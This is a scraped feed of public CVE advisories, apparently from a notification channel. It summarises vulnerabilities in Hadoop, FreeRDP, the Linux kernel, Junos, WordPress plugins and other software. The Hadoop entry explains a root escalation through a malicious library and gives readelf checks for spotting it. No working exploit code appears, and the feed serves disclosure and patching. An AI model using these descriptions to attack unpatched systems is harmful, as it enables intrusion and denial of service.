🚨 CVE-2023-26031Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges.Hadoop 3.3.0 updated the " YARN Secure Containers https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html " to add a feature for executing user-submitted applications in isolated linux containers.The native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs.The patch " YARN-10495 https://issues.apache.org/jira/browse/YARN-10495 . make the rpath of container-executor configurable" modified the library loading path for loading .so files from "$ORIGIN/" to ""$ORIGIN/:../lib/native/". This is the a path through which libcrypto.so is located. Thus it is is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root.If the YARN cluster is accepting work from remote (authenticated) users, and these users' submitted job are executed in the physical host, rather than a container, then the CVE permits remote users to gain root privileges.The fix for the vulnerability is to revert the change, which is done in YARN-11441 https://issues.apache.org/jira/browse/YARN-11441 , "Revert YARN-10495". This patch is in hadoop-3.3.5.To determine whether a version of container-executor is vulnerable, use the readelf command. If the RUNPATH or RPATH value contains the relative path "./lib/native/" then it is at risk$ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH) Library runpath: [$ORIGIN/:../lib/native/]If it does not, then it is safe:$ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH) Library runpath: [$ORIGIN/]For an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set$ ls -laF /opt/hadoop/bin/container-executor---Sr-s---. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executorA safe installation lacks the suid bit; ideally is also not owned by root.$ ls -laF /opt/hadoop/bin/container-executor-rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executorThis configuration does not support Yarn Secure Containers, but all other hadoop services, including YARN job execution outside secure containers continue to work.🎖@cveNotify |
|
| 2024-01-12 14:07:43 |
🚨 CVE-2024-0418A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-12 14:07:37 |
🚨 CVE-2024-0417A vulnerability, which was classified as critical, was found in DeShang DSShop up to 2.1.5. This affects an unknown part of the file application/home/controller/MemberAuth.php. The manipulation of the argument member_info leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250437 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-12 14:07:36 |
🚨 CVE-2024-0414A vulnerability classified as problematic has been found in DeShang DSCMS up to 3.1.2/7.1. Affected is an unknown function of the file public/install.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250434 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-12 14:07:35 |
🚨 CVE-2024-0413A vulnerability was found in DeShang DSKMS up to 3.1.2. It has been rated as problematic. This issue affects some unknown processing of the file public/install.php. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250433 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-12 14:07:31 |
🚨 CVE-2024-0411A vulnerability was found in DeShang DSMall up to 6.1.0. It has been classified as problematic. This affects an unknown part of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250431.🎖@cveNotify |
|
| 2024-01-12 14:07:30 |
🚨 CVE-2023-50671In exiftags 1.01, nikon_prop1 in nikon.c has a heap-based buffer overflow (write of size 28) because snprintf can write to an unexpected address.🎖@cveNotify |
|
| 2024-01-12 13:37:43 |
🚨 CVE-2023-40567FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Write in the `clear_decompress_bands_data` function in which there is no offset validation. Abuse of this vulnerability may lead to an out of bounds write. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. there are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-12 13:37:42 |
🚨 CVE-2023-40188FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Read in the `general_LumaToYUV444` function. This Out-Of-Bounds Read occurs because processing is done on the `in` variable without checking if it contains data of sufficient length. Insufficient data for the `in` variable may cause errors or crashes. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-01-12 13:37:41 |
🚨 CVE-2023-40181FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Integer-Underflow leading to Out-Of-Bound Read in the `zgfx_decompress_segment` function. In the context of `CopyMemory`, it's possible to read data beyond the transmitted packet range and likely cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-01-12 13:37:37 |
🚨 CVE-2023-39356FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a missing offset validation may lead to an Out Of Bound Read in the function `gdi_multi_opaque_rect`. In particular there is no code to validate if the value `multi_opaque_rect->numRectangles` is less than 45. Looping through `multi_opaque_rect->`numRectangles without proper boundary checks can lead to Out-of-Bounds Read errors which will likely lead to a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-12 13:37:36 |
🚨 CVE-2023-39355FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Versions of FreeRDP on the 3.x release branch before beta3 are subject to a Use-After-Free in processing `RDPGFX_CMDID_RESETGRAPHICS` packets. If `context->maxPlaneSize` is 0, `context->planesBuffer` will be freed. However, without updating `context->planesBuffer`, this leads to a Use-After-Free exploit vector. In most environments this should only result in a crash. This issue has been addressed in version 3.0.0-beta3 and users of the beta 3.x releases are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-12 13:37:35 |
🚨 CVE-2023-39354FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Read in the `nsc_rle_decompress_data` function. The Out-Of-Bounds Read occurs because it processes `context->Planes` without checking if it contains data of sufficient length. Should an attacker be able to leverage this vulnerability they may be able to cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-12 13:37:32 |
🚨 CVE-2023-39351FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions of FreeRDP are subject to a Null Pointer Dereference leading a crash in the RemoteFX (rfx) handling. Inside the `rfx_process_message_tileset` function, the program allocates tiles using `rfx_allocate_tiles` for the number of numTiles. If the initialization process of tiles is not completed for various reasons, tiles will have a NULL pointer. Which may be accessed in further processing and would cause a program crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-12 13:37:31 |
🚨 CVE-2023-40589FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions there is a Global-Buffer-Overflow in the ncrush_decompress function. Feeding crafted input into this function can trigger the overflow which has only been shown to cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-01-12 13:37:30 |
🚨 CVE-2022-39318FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP are missing input validation in `urbdrc` channel. A malicious server can trick a FreeRDP based client to crash with division by zero. This issue has been addressed in version 2.9.0. All users are advised to upgrade. Users unable to upgrade should not use the `/usb` redirection switch.🎖@cveNotify |
|
| 2024-01-12 13:37:26 |
🚨 CVE-2022-39317FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP are missing a range check for input offset index in ZGFX decoder. A malicious server can trick a FreeRDP based client to read out of bound data and try to decode it. This issue has been addressed in version 2.9.0. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-01-12 13:37:25 |
🚨 CVE-2022-39320FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP may attempt integer addition on too narrow types leads to allocation of a buffer too small holding the data written. A malicious server can trick a FreeRDP based client to read out of bound data and send it back to the server. This issue has been addressed in version 2.9.0 and all users are advised to upgrade. Users unable to upgrade should not use the `/usb` redirection switch.🎖@cveNotify |
|
| 2024-01-12 13:37:24 |
🚨 CVE-2022-39316FreeRDP is a free remote desktop protocol library and clients. In affected versions there is an out of bound read in ZGFX decoder component of FreeRDP. A malicious server can trick a FreeRDP based client to read out of bound data and try to decode it likely resulting in a crash. This issue has been addressed in the 2.9.0 release. Users are advised to upgrade.🎖@cveNotify |
|
| 2024-01-12 12:37:24 |
🚨 CVE-2022-46146Prometheus Exporter Toolkit is a utility package to build exporters. Prior to versions 0.7.2 and 0.8.2, if someone has access to a Prometheus web.yml file and users' bcrypted passwords, they can bypass security by poisoning the built-in authentication cache. Versions 0.7.2 and 0.8.2 contain a fix for the issue. There is no workaround, but attacker must have access to the hashed password to use this functionality.🎖@cveNotify |
|
| 2024-01-12 11:37:25 |
🚨 CVE-2023-49568A denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients.Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability.This is a go-git implementation issue and does not affect the upstream git cli.🎖@cveNotify |
|
| 2024-01-12 11:37:24 |
🚨 CVE-2024-0416A vulnerability, which was classified as critical, has been found in DeShang DSMall up to 5.0.3. Affected by this issue is some unknown functionality of the file application/home/controller/MemberAuth.php. The manipulation of the argument file_name leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250436.🎖@cveNotify |
|
| 2024-01-12 09:37:25 |
🚨 CVE-2023-30015SQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via txtsearch parameter in review_search.php.🎖@cveNotify |
|
| 2024-01-12 09:37:24 |
🚨 CVE-2023-30014SQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via sub_event_id parameter in sub_event_stat_update.php.🎖@cveNotify |
|
| 2024-01-12 08:37:32 |
🚨 CVE-2023-26433When adding an external mail account, processing of IMAP "capabilities" responses are not limited to plausible sizes. Attacker with access to a rogue IMAP service could trigger requests that lead to excessive resource usage and eventually service unavailability. We now limit accepted IMAP server response to reasonable length/size. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 08:37:26 |
🚨 CVE-2023-26432When adding an external mail account, processing of SMTP "capabilities" responses are not limited to plausible sizes. Attacker with access to a rogue SMTP service could trigger requests that lead to excessive resource usage and eventually service unavailability. We now limit accepted SMTP server response to reasonable length/size. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 08:37:25 |
🚨 CVE-2023-26428Attackers can successfully request arbitrary snippet IDs, including E-Mail signatures of other users within the same context. Signatures of other users could be read even though they are not explicitly shared. We improved permission handling when requesting snippets that are not explicitly shared with other users. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 08:37:24 |
🚨 CVE-2023-26427Default permissions for a properties file were too permissive. Local system users could read potentially sensitive information. We updated the default permissions for noreply.properties set during package installation. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 07:37:38 |
🚨 CVE-2023-29050The optional "LDAP contacts provider" could be abused by privileged users to inject LDAP filter strings that allow to access content outside of the intended hierarchy. Unauthorized users could break confidentiality of information in the directory and potentially cause high load on the directory server, leading to denial of service. Encoding has been added for user-provided fragments that are used when constructing the LDAP query. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 07:37:31 |
🚨 CVE-2023-29049The "upsell" widget at the portal page could be abused to inject arbitrary script code. Attackers that manage to lure users to a compromised account, or gain temporary access to a legitimate account, could inject script code to gain persistent code execution capabilities under a trusted domain. User input for this widget is now sanitized to avoid malicious content the be processed. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 07:37:30 |
🚨 CVE-2023-29046Connections to external data sources, like e-mail autoconfiguration, were not terminated in case they hit a timeout, instead those connections were logged. Some connections use user-controlled endpoints, which could be malicious and attempt to keep the connection open for an extended period of time. As a result users were able to trigger large amount of egress network connections, possibly exhausting network pool resources and lock up legitimate requests. A new mechanism has been introduced to cancel external connections that might access user-controlled endpoints. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 07:37:29 |
🚨 CVE-2023-29045Documents operations, in this case "drawing", could be manipulated to contain invalid data types, possibly script code. Script code could be injected to an operation that would be executed for users that are actively collaborating on the same document. Operation data exchanged between collaborating parties does now gets checked for validity to avoid code execution. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 07:37:26 |
🚨 CVE-2023-29044Documents operations could be manipulated to contain invalid data types, possibly script code. Script code could be injected to an operation that would be executed for users that are actively collaborating on the same document. Operation data exchanged between collaborating parties does now get escaped to avoid code execution. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 07:37:25 |
🚨 CVE-2023-26452Requests to cache an image and return its metadata could be abused to include SQL queries that would be executed unchecked. Exploiting this vulnerability requires at least access to adjacent networks of the imageconverter service, which is not exposed to public networks by default. Arbitrary SQL statements could be executed in the context of the services database user account. API requests are now properly checked for valid content and attempts to circumvent this check are being logged as error. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 07:37:24 |
🚨 CVE-2023-26451Functions with insufficient randomness were used to generate authorization tokens of the integrated oAuth Authorization Service. Authorization codes were predictable for third parties and could be used to intercept and take over the client authorization process. As a result, other users accounts could be compromised. The oAuth Authorization Service is not enabled by default. We have updated the implementation to use sources with sufficient randomness to generate authorization tokens. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-12 05:37:25 |
🚨 CVE-2024-23171An issue was discovered in the CampaignEvents extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:EventDetails page allows XSS via the x-xss language setting for internationalization (i18n).🎖@cveNotify |
|
| 2024-01-12 05:37:24 |
🚨 CVE-2022-4961A vulnerability was found in Weitong Mall 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file platform-shop\src\main\resources\com\platform\dao\OrderDao.xml. The manipulation of the argument sidx/order leads to sql injection. The associated identifier of this vulnerability is VDB-250243.🎖@cveNotify |
|
| 2024-01-12 04:37:24 |
🚨 CVE-2022-48620uev (aka libuev) before 2.4.1 has a buffer overflow in epoll_wait if maxevents is a large number.🎖@cveNotify |
|
| 2024-01-12 03:37:25 |
🚨 CVE-2023-34194StringEqual in TiXmlDeclaration::Parse in tinyxmlparser.cpp in TinyXML through 2.6.2 has a reachable assertion (and application exit) via a crafted XML document with a '\0' located after whitespace.🎖@cveNotify |
|
| 2024-01-12 03:37:24 |
🚨 CVE-2021-42260TinyXML through 2.6.2 has an infinite loop in TiXmlParsingData::Stamp in tinyxmlparser.cpp via the TIXML_UTF_LEAD_0 case. It can be triggered by a crafted XML message and leads to a denial of service.🎖@cveNotify |
|
| 2024-01-12 02:37:25 |
🚨 CVE-2023-6040An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.🎖@cveNotify |
|
| 2024-01-12 02:37:24 |
🚨 CVE-2023-40250Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Hancom HCell on Windows allows Overflow Buffers.This issue affects HCell: 12.0.0.893.🎖@cveNotify |
|
| 2024-01-12 01:37:25 |
🚨 CVE-2024-21585An Improper Handling of Exceptional Conditions vulnerability in BGP session processing of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker, using specific timing outside the attacker's control, to flap BGP sessions and cause the routing protocol daemon (rpd) process to crash and restart, leading to a Denial of Service (DoS) condition. Continued BGP session flapping will create a sustained Denial of Service (DoS) condition.This issue only affects routers configured with non-stop routing (NSR) enabled. Graceful Restart (GR) helper mode, enabled by default, is also required for this issue to be exploitable.When the BGP session flaps on the NSR-enabled router, the device enters GR-helper/LLGR-helper mode due to the peer having negotiated GR/LLGR-restarter capability and the backup BGP requests for replication of the GR/LLGR-helper session, master BGP schedules, and initiates replication of GR/LLGR stale routes to the backup BGP. In this state, if the BGP session with the BGP peer comes up again, unsolicited replication is initiated for the peer without cleaning up the ongoing GR/LLGR-helper mode replication. This parallel two instances of replication for the same peer leads to the assert if the BGP session flaps again.This issue affects:Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO; * 22.3 versions earlier than 22.3R3-S1-EVO; * 22.4 versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.2 versions earlier than 23.2R1-S1-EVO, 23.2R2-EVO.🎖@cveNotify |
|
| 2024-01-12 01:37:24 |
🚨 CVE-2023-36842An Improper Check for Unusual or Exceptional Conditions vulnerability in Juniper DHCP Daemon (jdhcpd) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause the jdhcpd to consume all the CPU cycles resulting in a Denial of Service (DoS).On Junos OS devices with forward-snooped-client configured, if an attacker sends a specific DHCP packet to a non-configured interface, this will cause an infinite loop. The DHCP process will have to be restarted to recover the service.This issue affects:Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R2.🎖@cveNotify |
|
| 2024-01-12 00:37:24 |
🚨 CVE-2024-0443A flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with a local access to cause system instability, such as an out of memory error.🎖@cveNotify |
|
| 2024-01-11 23:37:25 |
🚨 CVE-2023-6594The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 9.7.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. Administrators can give button creation privileges to users with lower levels (contributor+) which would allow those lower-privileged users to carry out attacks.🎖@cveNotify |
|
| 2024-01-11 23:37:24 |
🚨 CVE-2023-47489CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components.🎖@cveNotify |
|
| 2024-01-11 23:07:24 |
🚨 CVE-2023-27000Cross Site Scripting vulnerability found in NetScoutnGeniusOne v.6.3.4 allows a remote attacker to execute arbitrary code via the name parameter of the Profile and Exclusion List page(s).🎖@cveNotify |
|
| 2024-01-11 22:37:32 |
🚨 CVE-2024-21337Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-11 22:37:26 |
🚨 CVE-2023-46474File Upload vulnerability PMB v.7.4.8 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted PHP file uploaded to the start_import.php file.🎖@cveNotify |
|
| 2024-01-11 22:37:25 |
🚨 CVE-2023-35633Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-11 22:37:24 |
🚨 CVE-2023-35356Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-11 21:37:32 |
🚨 CVE-2023-5717A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.If perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.We recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.🎖@cveNotify |
|
| 2024-01-11 21:37:25 |
🚨 CVE-2023-35827An issue was discovered in the Linux kernel through 6.3.8. A use-after-free was found in ravb_remove in drivers/net/ethernet/renesas/ravb_main.c.🎖@cveNotify |
|
| 2024-01-11 21:37:24 |
🚨 CVE-2021-44879In gc_data_segment in fs/f2fs/gc.c in the Linux kernel before 5.16.3, special files are not considered, leading to a move_data_page NULL pointer dereference.🎖@cveNotify |
|
| 2024-01-11 21:07:24 |
🚨 CVE-2023-6921Blind SQL Injection vulnerability in PrestaShow Google Integrator (PrestaShop addon) allows for data extraction and modification. This attack is possible via command insertion in one of the cookies.🎖@cveNotify |
|
| 2024-01-11 20:37:32 |
🚨 CVE-2023-52198Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michiel van Eerd Private Google Calendars allows Stored XSS.This issue affects Private Google Calendars: from n/a through 20231125.🎖@cveNotify |
|
| 2024-01-11 20:37:25 |
🚨 CVE-2023-52265IDURAR (aka idurar-erp-crm) through 2.0.1 allows stored XSS via a PATCH request with a crafted JSON email template in the /api/email/update data.🎖@cveNotify |
|
| 2024-01-11 20:37:24 |
🚨 CVE-2023-6998Improper privilege management vulnerability in CoolKit Technology eWeLink on Android and iOS allows application lockscreen bypass.This issue affects eWeLink before 5.2.0.🎖@cveNotify |
|
| 2024-01-11 20:07:32 |
🚨 CVE-2023-5957The Ni Purchase Order(PO) For WooCommerce WordPress plugin through 1.2.1 does not validate logo and signature image files uploaded in the settings, allowing high privileged user to upload arbitrary files to the web server, triggering an RCE vulnerability by uploading a web shell.🎖@cveNotify |
|
| 2024-01-11 20:07:26 |
🚨 CVE-2023-5911The WP Custom Cursors | WordPress Cursor Plugin WordPress plugin through 3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-01-11 20:07:25 |
🚨 CVE-2023-30617Kruise provides automated management of large-scale applications on Kubernetes. Starting in version 0.8.0 and prior to versions 1.3.1, 1.4.1, and 1.5.2, an attacker who has gained root privilege of the node that kruise-daemon run can leverage the kruise-daemon pod to list all secrets in the entire cluster. After that, the attacker can leverage the "captured" secrets (e.g. the kruise-manager service account token) to gain extra privileges such as pod modification. Versions 1.3.1, 1.4.1, and 1.5.2 fix this issue. A workaround is available. For users that do not require imagepulljob functions, they can modify kruise-daemon-role to drop the cluster level secret get/list privilege.🎖@cveNotify |
|
| 2024-01-11 20:07:24 |
🚨 CVE-2023-51074json-path v2.8.0 was discovered to contain a stack overflow via the Criteria.parse() method.🎖@cveNotify |
|
| 2024-01-11 19:37:32 |
🚨 CVE-2023-3390A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.Mishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.We recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97.🎖@cveNotify |
|
| 2024-01-11 19:37:26 |
🚨 CVE-2023-3212A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel. It occurs on corrupt gfs2 file systems when the evict code tries to reference the journal descriptor structure after it has been freed and set to NULL. A privileged local user could use this flaw to cause a kernel panic.🎖@cveNotify |
|
| 2024-01-11 19:37:25 |
🚨 CVE-2023-0590A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue. If patch ebda44da44f6 ("net: sched: fix race condition in qdisc_graft()") not applied yet, then kernel could be affected.🎖@cveNotify |
|
| 2024-01-11 19:37:24 |
🚨 CVE-2021-44879In gc_data_segment in fs/f2fs/gc.c in the Linux kernel before 5.16.3, special files are not considered, leading to a move_data_page NULL pointer dereference.🎖@cveNotify |
|
| 2024-01-11 19:07:32 |
🚨 CVE-2024-21744Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mapster Technology Inc. Mapster WP Maps allows Stored XSS.This issue affects Mapster WP Maps: from n/a through 1.2.38.🎖@cveNotify |
|
| 2024-01-11 19:07:26 |
🚨 CVE-2024-21650XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the "first name" or "last name" fields during user registration. This impacts all installations that have user registration enabled for guests. This vulnerability has been patched in XWiki 14.10.17, 15.5.3 and 15.8 RC1.🎖@cveNotify |
|
| 2024-01-11 19:07:25 |
🚨 CVE-2024-0302A vulnerability, which was classified as critical, has been found in fhs-opensource iparking 1.5.22.RELEASE. This issue affects some unknown processing of the file /vueLogin. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249869 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-11 19:07:24 |
🚨 CVE-2024-0301A vulnerability classified as critical was found in fhs-opensource iparking 1.5.22.RELEASE. This vulnerability affects the function getData of the file src/main/java/com/xhb/pay/action/PayTempOrderAction.java. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249868.🎖@cveNotify |
|
| 2024-01-11 18:37:32 |
🚨 CVE-2023-38653Multiple integer overflow vulnerabilities exist in the VZT vzt_rd_block_vch_decode dict parsing functionality of GTKWave 3.3.115. A specially crafted .vzt file can lead to memory corruption. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the integer overflow when num_time_ticks is zero.🎖@cveNotify |
|
| 2024-01-11 18:37:25 |
🚨 CVE-2023-7212A vulnerability classified as critical has been found in DeDeCMS up to 5.7.112. Affected is an unknown function of the file file_class.php of the component Backend. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249768. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-11 18:37:24 |
🚨 CVE-2023-5880When the Genie Company Aladdin Connect garage door opener (Retrofit-Kit Model ALDCM) is placed into configuration mode the web servers “Garage Door Control Module Setup” page is vulnerable to XSS via a broadcast SSID name containing malicious code with client side Java Script and/or HTML. This allows the attacker to inject malicious code with client side Java Script and/or HTML into the users' web browser.🎖@cveNotify |
|
| 2024-01-11 18:07:32 |
🚨 CVE-2023-37420Multiple out-of-bounds write vulnerabilities exist in the VCD parse_valuechange portdump functionality of GTKWave 3.3.115. A specially crafted .vcd file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the out-of-bounds write when triggered via the vcd2lxt conversion utility.🎖@cveNotify |
|
| 2024-01-11 18:07:26 |
🚨 CVE-2023-37419Multiple out-of-bounds write vulnerabilities exist in the VCD parse_valuechange portdump functionality of GTKWave 3.3.115. A specially crafted .vcd file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the out-of-bounds write when triggered via the vcd2lxt2 conversion utility.🎖@cveNotify |
|
| 2024-01-11 18:07:25 |
🚨 CVE-2024-21909PeterO.Cbor versions 4.0.0 through 4.5.0 are vulnerable to a denial of service vulnerability. An attacker may trigger the denial of service condition by providing crafted data to the DecodeFromBytes or other decoding mechanisms in PeterO.Cbor. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition.🎖@cveNotify |
|
| 2024-01-11 18:07:24 |
🚨 CVE-2023-52275Gallery3d on Tecno Camon X CA7 devices allows attackers to view hidden images by navigating to data/com.android.gallery3d/.privatealbum/.encryptfiles and guessing the correct image file extension.🎖@cveNotify |
|
| 2024-01-11 17:37:32 |
🚨 CVE-2023-34324Closing of an event channel in the Linux kernel can result in a deadlock.This happens when the close is being performed in parallel to an unrelatedXen console action and the handling of a Xen console interrupt in anunprivileged guest.The closing of an event channel is e.g. triggered by removal of aparavirtual device on the other side. As this action will cause consolemessages to be issued on the other side quite often, the chance oftriggering the deadlock is not neglectable.Note that 32-bit Arm-guests are not affected, as the 32-bit Linux kernelon Arm doesn't use queued-RW-locks, which are required to trigger theissue (on Arm32 a waiting writer doesn't block further readers to getthe lock).🎖@cveNotify |
|
| 2024-01-11 17:37:26 |
